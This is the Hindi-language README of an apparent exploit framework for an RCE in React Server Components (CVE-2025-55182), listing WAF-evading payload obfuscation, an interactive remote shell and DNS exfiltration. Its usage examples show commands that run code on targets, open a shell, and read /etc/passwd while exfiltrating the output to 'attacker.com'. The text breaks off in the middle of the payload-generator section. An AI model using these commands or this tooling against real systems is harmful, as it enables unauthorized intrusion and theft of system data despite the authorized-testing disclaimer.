
CVE-2025-55182 के लिए उन्नत React Server Components RCE स्कैनर। विशेषताएँ: बहु-चरणीय फ़िंगरप्रिंटिंग, भेद्यता सत्यापन, DNS एक्सफ़िल्ट्रेशन, इंटरैक्टिव शेल, पेलोड ऑब्फ़स्केशन, और पेशेवर रिपोर्टिंग (JSON/HTML/PDF)। केवल अधिकृत परीक्षण।
यह टूल विशेष रूप से शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व लिखित सहमति के बिना लक्ष्यों के विरुद्ध इस सॉफ़्टवेयर का अनधिकृत उपयोग अंतर्राष्ट्रीय कंप्यूटर अपराध कानूनों का उल्लंघन है, जिसमें Computer Fraud and Abuse Act (CFAA), GDPR प्रावधान, और मानक सेवा शर्तें समझौते शामिल हैं। लेखक और योगदानकर्ता इस कार्यक्रम से उत्पन्न किसी भी दुरुपयोग, अवैध संचालन, या परिणामी क्षति के लिए सभी दायित्वों से इनकार करते हैं।पूर्णतः अपने जोखिम पर आगे बढ़ें।
ReactRCE-Scanner एक एंटरप्राइज़-ग्रेड सुरक्षा मूल्यांकन और सत्यापन फ्रेमवर्क है, जिसे विशेष रूप से CVE-2025-55182 [1] के लिए डिज़ाइन किया गया है, जो एक गंभीर Remote Code Execution (RCE) भेद्यता है जो React Server Components को संस्करण 19.0.0 से 19.2.0 तक प्रभावित करती है।
यह फ्रेमवर्क सैद्धांतिक भेद्यता अनुसंधान और व्यावहारिक सुरक्षा सत्यापन के बीच की खाई को पाटता है। बहु-चरणीय फिंगरप्रिंटिंग, कठोर गलत-सकारात्मक कमी, उन्नत पेलोड ऑब्फस्केशन, और स्वचालित बहु-प्रारूप रिपोर्टिंग को शामिल करके, यह सुरक्षा इंजीनियरों को सटीक नैदानिक क्षमताएँ प्रदान करता है।
| उपयोग | स्कैन परिणाम |
|---|---|
| विशेषता श्रेणी | कार्यान्वयन विशेषता | परिचालन स्थिति |
|---|---|---|
| स्मार्ट फिंगरप्रिंटिंग | विश्वास स्कोरिंग एल्गोरिदम के साथ बहु-स्रोत फ्रेमवर्क और संस्करण पहचान। | ✅ |
| बहु-चरणीय सत्यापन | गलत सकारात्मक को व्यवस्थित रूप से समाप्त करने के लिए डिज़ाइन की गई 5-चरणीय सत्यापन पाइपलाइन। | ✅ |
| पेलोड जनरेशन | DNS एक्सफ़िल्ट्रेशन और बहु-एन्कोडिंग का समर्थन करने वाला ऑब्फस्केटेड पेलोड बिल्डर। | ✅ |
| इंटरैक्टिव शेल | सत्यापित लक्ष्यों पर रीयल-टाइम छद्म-इंटरैक्टिव कमांड निष्पादन और शेल एक्सेस। | ✅ |
| व्यापक रिपोर्टिंग | JSON, HTML, PDF, और Markdown प्रारूपों में स्वचालित रिपोर्ट जनरेशन। | ✅ |
| DNS एक्सफ़िल्ट्रेशन | सुरक्षित DNS क्वेरी हैंडलिंग के माध्यम से आउट-ऑफ-बैंड कमांड आउटपुट एक्सफ़िल्ट्रेशन। | ✅ |
| कंकरेंसी इंजन | बड़े अटैक सरफेस के लिए उच्च-प्रदर्शन मल्टी-थ्रेडेड स्कैनिंग आर्किटेक्चर। | ✅ |
| प्रॉक्सी एकीकरण | अनाम मूल्यांकन ट्रैफ़िक के लिए HTTP/HTTPS और SOCKS प्रॉक्सी समर्थन। | ✅ |
रिपॉज़िटरी को क्लोन करें और स्वचालित सेटअप स्क्रिप्ट या मैन्युअल निर्भरता इंस्टॉलेशन का उपयोग करके वातावरण को प्रारंभ करें:
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
यह फ्रेमवर्क एक मॉड्यूलर CLI आर्किटेक्चर के माध्यम से संचालित होता है जो एकल-लक्ष्य सत्यापन, फ़ाइल सूचियों से बल्क स्कैनिंग, इंटरैक्टिव शेल स्पॉनिंग, और अनुपालन रिपोर्टिंग का समर्थन करता है।
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
यह फ्रेमवर्क पेलोड डिलीवरी से पहले गहन टोह लेता है। यह कई HTTP हेडर फ़ील्ड (X-Powered-By, Next-Action, RSC), HTML संरचनात्मक मेटा टैग (data-reactroot, __NEXT_DATA__), स्थिर बिल्ड एसेट्स, और JavaScript स्रोत बंडलों [2] [3] का विश्लेषण करता है।
विश्वास स्कोर चार श्रेणियों में वर्गीकृत हैं:
CRITICAL (95%+): कई स्वतंत्र संकेतक भेद्य React Server Component रनटाइम संस्करणों की पुष्टि करते हैं।
HIGH (75–95%): सटीक संस्करण मिलान के साथ मजबूत संरचनात्मक संकेतक पहचाने गए।
MEDIUM (50–75%): आंशिक फ्रेमवर्क मार्कर मौजूद; मैन्युअल सत्यापन आवश्यक।
LOW (<50%): कमजोर ह्यूरिस्टिक्स का पता चला; गलत सकारात्मक की उच्च संभावना।
परिचालन अखंडता बनाए रखने और अनपेक्षित सेवा व्यवधानों को रोकने के लिए, किसी भी शोषण चरण को अनलॉक करने से पहले पेलोड एक कठोर सत्यापन पाइपलाइन से गुज़रते हैं।
Target URL / Endpoint
│
▼
[Stage 1] Framework & Header Detection
│
▼
[Stage 2] Component Version Analysis
│
▼
[Stage 3] Protocol Compatibility Check
│
▼
[Stage 4] Non-Destructive Safe Validation Request
│
▼
[Stage 5] Statistical Confidence Scoring
│
▼
Vulnerability Assessment Decision
रक्षात्मक नियंत्रणों और Web Application Firewalls (WAFs) का परीक्षण करने के लिए, यह फ्रेमवर्क एक उन्नत पेलोड जनरेटर एम्बेड करता है जो समर्थन करता है: